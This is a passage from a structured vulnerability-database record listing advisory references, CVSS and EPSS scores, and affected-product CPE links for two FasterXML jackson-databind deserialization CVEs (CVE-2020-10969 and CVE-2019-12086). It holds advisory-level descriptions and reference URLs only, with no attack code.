url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
55
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
56
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
57
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*
58
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*
59
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*
60
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*
61
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*
62
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*
63
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
64
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
65
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
66
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
67
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*
68
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
69
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
70
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
71
reference_url https://github.com/advisories/GHSA-758m-v56v-grj4
reference_id GHSA-758m-v56v-grj4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-758m-v56v-grj4
72
reference_url https://access.redhat.com/errata/RHSA-2020:1523
reference_id RHSA-2020:1523
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1523
73
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
74
reference_url https://access.redhat.com/errata/RHSA-2020:2333
reference_id RHSA-2020:2333
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2333
75
reference_url https://access.redhat.com/errata/RHSA-2020:2813
reference_id RHSA-2020:2813
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2813
76
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
77
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
78
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
79
reference_url https://access.redhat.com/errata/RHSA-2020:3779
reference_id RHSA-2020:3779
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3779
80
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
81
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-10969, GHSA-758m-v56v-grj4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9qdt-7p83-4yd8
23
url VCID-9wej-f7zx-pfeq
vulnerability_id VCID-9wej-f7zx-pfeq
summary 
Information exposure in FasterXML jackson-databind
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.
references
0
reference_url https://access.redhat.com/errata/RHSA-2019:2858
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:2858
1
reference_url https://access.redhat.com/errata/RHSA-2019:2935
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:2935
2
reference_url https://access.redhat.com/errata/RHSA-2019:2936
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:2936
3
reference_url https://access.redhat.com/errata/RHSA-2019:2937
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:2937
4
reference_url https://access.redhat.com/errata/RHSA-2019:2938
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:2938
5
reference_url https://access.redhat.com/errata/RHSA-2019:2998
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:2998
6
reference_url https://access.redhat.com/errata/RHSA-2019:3044
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3044
7
reference_url https://access.redhat.com/errata/RHSA-2019:3045
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3045
8
reference_url https://access.redhat.com/errata/RHSA-2019:3046
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3046
9
reference_url https://access.redhat.com/errata/RHSA-2019:3050
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3050
10
reference_url https://access.redhat.com/errata/RHSA-2019:3149
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3149
11
reference_url https://access.redhat.com/errata/RHSA-2019:3200
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3200
12
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12086.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12086.json
13
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-12086
reference_id
reference_type
scores
0
value 0.15501
scoring_system epss
scoring_elements 0.94644
published_at 2026-04-07T12:55:00Z
1
value 0.15501
scoring_system epss
scoring_elements 0.94654
published_at 2026-04-08T12:55:00Z
2
value 0.15501
scoring_system epss
scoring_elements 0.94659
published_at 2026-04-09T12:55:00Z
3
value 0.15501
scoring_system epss
scoring_elements 0.94663
published_at 2026-04-11T12:55:00Z
4
value 0.15501
scoring_system epss
scoring_elements 0.94666
published_at 2026-04-12T12:55:00Z
5
value 0.15501
scoring_system epss
scoring_elements 0.94636
published_at 2026-04-02T12:55:00Z
6
value 0.15501
scoring_system epss
scoring_elements 0.94667
published_at 2026-04-13T12:55:00Z
7
value 0.15501
scoring_system epss
scoring_elements 0.94628
published_at 2026-04-01T12:55:00Z
8
value 0.15501
scoring_system epss
scoring_elements 0.94642
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-12086
14
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11307
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11307
15
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12022
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12022
16
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12023
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12023
17
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14718
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14718
18
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14719
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14719
19
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14720
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14720
20
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14721
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14721
21
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19360
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19360
22
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19361
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19361
23
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19362
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19362
24
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12086
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12086
25
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
26
reference_url https://github.com/FasterXML/jackson-databind/commit/d30f036208ab1c60bd5ce429cb4f7f1a3e5682e8
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/d30f036208ab1c60bd5ce429cb4f7f1a3e5682e8
27
reference_url https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024
28
reference_url https://github.com/FasterXML/jackson-databind/commit/efc3c0d02f4743dbaa6d1b9c466772a2f13d966b
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/efc3c0d02f4743dbaa6d1b9c466772a2f13d966b
29
reference_url https://github.com/FasterXML/jackson-databind/issues/2326
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/2326
30
reference_url https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9
31
reference_url https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E
32
reference_url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E
33
reference_url https://lists.apache.org/thread.html/88cd25375805950ae7337e669b0cb0eeda98b9604c1b8d806dccbad2@%3Creviews.spark.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/88cd25375805950ae7337e669b0cb0eeda98b9604c1b8d806dccbad2@%3Creviews.spark.apache.org%3E
34
reference_url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E
35
reference_url https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E
36
reference_url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E
37
reference_url https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E
38
reference_url https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E
39
reference_url https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E
40
reference_url https://lists.debian.org/debian-lts-announce/2019/05/msg00030.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2019/05/msg00030.html
41
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL
42
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544
43
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC
44
reference_url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
45
reference_url https://seclists.org/bugtraq/2019/May/68
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://seclists.org/bugtraq/2019/May/68
46
reference_url https://security.netapp.com/advisory/ntap-20190530-0003
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20190530-0003
47
reference_url https://web.archive.org/web/20200227030031/http://www.securityfocus.com/bid/109227
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200227030031/http://www.securityfocus.com/bid/109227
48
reference_url https://web.archive.org/web/20200808181049/http://russiansecurity.expert/2016/04/20/mysql-connect-file-read
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200808181049/http://russiansecurity.expert/2016/04/20/mysql-connect-file-read
49
reference_url https://www.debian.org/security/2019/dsa-4452
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2019/dsa-4452
50
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2020.html
51
reference_url https://www.oracle.com/security-alerts/cpuApr2021.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuApr2021.html
52
reference_url https://www.oracle.com/security-alerts/cpuapr2022.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2022.html
53
reference_url https://www.oracle.com/security-alerts/cpujan2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
